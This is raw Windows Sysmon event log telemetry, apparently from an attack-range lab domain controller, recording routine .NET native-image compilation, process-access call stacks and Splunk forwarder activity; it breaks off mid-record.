21:06:19.609{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A24B-60D3-C704-00000000CF01}2312C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021990Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:19.609{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A24B-60D3-C704-00000000CF01}2312C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021989Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:19.578{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=165805A1DF0B273FC439CD667FFAA32F,SHA256=5FC580923835745A1C5B28288789E0442F0E032628F85F8047A2A01BCC04EA66,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021988Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:19.546{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A24B-60D3-C604-00000000CF01}5300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021987Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:19.531{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A24B-60D3-C604-00000000CF01}5300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021986Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:19.531{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A24B-60D3-C604-00000000CF01}5300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021985Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:19.437{4DB9351A-A24A-60D3-C504-00000000CF01}500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1f4-0\System.ServiceModel.Web.dll2021-06-23 21:06:19.437 10341000x800000000000000022001Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:20.812{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A24C-60D3-C904-00000000CF01}6668C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022000Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:20.796{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A24C-60D3-C904-00000000CF01}6668C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021999Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:20.796{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A24C-60D3-C904-00000000CF01}6668C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021998Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:20.671{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6EF222D65ACF50BCB907F9414EF8EE8E,SHA256=DBAF13270EA99A851A8C5E1DFE189666C1307996F147B5E56D0408B6E454BD13,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021997Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:20.546{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A24C-60D3-C804-00000000CF01}4280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021996Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:20.531{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A24C-60D3-C804-00000000CF01}4280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021995Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:20.531{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A24C-60D3-C804-00000000CF01}4280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021994Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:20.406{4DB9351A-A24B-60D3-C704-00000000CF01}2312C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\908-0\System.Speech.dll2021-06-23 21:06:20.406 23542300x800000000000000021993Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:19.999{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F123227C688E3F78CC93EE604354F791,SHA256=D54313F18DEE6E1658045F070DFE53FA660AF3FA34D61BA383FAEF8401BE90C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022003Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:21.968{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CFA92A4F6E910A6028AF4A9548C88B5B,SHA256=3A0370BCD828F0E22588B447EF6C1E8E69F1C78E8F84029A1339A69C44A406D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022002Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:20.999{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D74C580B7A9F9A09D6096DF453FEF74,SHA256=DFE23ECEC6516BCDAE34B734229D72CB40E0BDA4B8CFB6073A538ECAD0B37C38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022004Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:22.109{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26CEF7CCA0D6D2FDFFDCBB72CA03F232,SHA256=54F55FA60B234629F13019DBFBA01BB2E148654E9FDB9DC072A1CEC817DF2AA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022006Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:23.140{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C91DF8FF6F4D6CB78F4046AD0BD3355,SHA256=D29D9C3F71FE6B786E35FED9CBF44BDA1741D7456CD5E954BCA71370E90B1BB9,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000022005Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:21.210{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61450-false10.0.1.12-8000- 23542300x800000000000000022007Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:24.187{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE3DF259ECCFC419D85AE8B475AE1994,SHA256=BB0ED9D1E72D8C2DD1FCD0A88A73D8673C9C92D4E06D2C92316FAD85A639ADC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022008Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:25.187{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DB3EF0A1FFA6DE319E376F3BD7538C4,SHA256=9B0AB84985B0C881B7173F58AB2A83CD0B609CFCD0FC579C975BBF729B0733F7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000022011Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:26.624{4DB9351A-A24C-60D3-C904-00000000CF01}6668C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1a0c-0\System.Web.dll2021-06-23 21:06:26.624 23542300x800000000000000022010Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:26.203{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=733EB766B16E5408E4DCDAA5E06BA13C,SHA256=265C4C7872FD776C98310ECEB291B06578E4C3D5D99EB3A2F6F42C9811F36ADA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022009Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:26.156{4DB9351A-9DDD-60D3-1200-00000000CF01}416NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=ECEE81551E45E38B40BA578924FA1F6B,SHA256=178A2C9E2648257BCF122F7DA6F6B1AC163ADD0AD79F5EA853A284F85236B286,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022032Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.984{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A253-60D3-CF04-00000000CF01}1040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022031Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.968{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A253-60D3-CF04-00000000CF01}1040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022030Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.968{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A253-60D3-CF04-00000000CF01}1040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022029Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.859{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A253-60D3-CE04-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022028Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.843{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A253-60D3-CE04-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022027Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.843{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A253-60D3-CE04-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022026Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 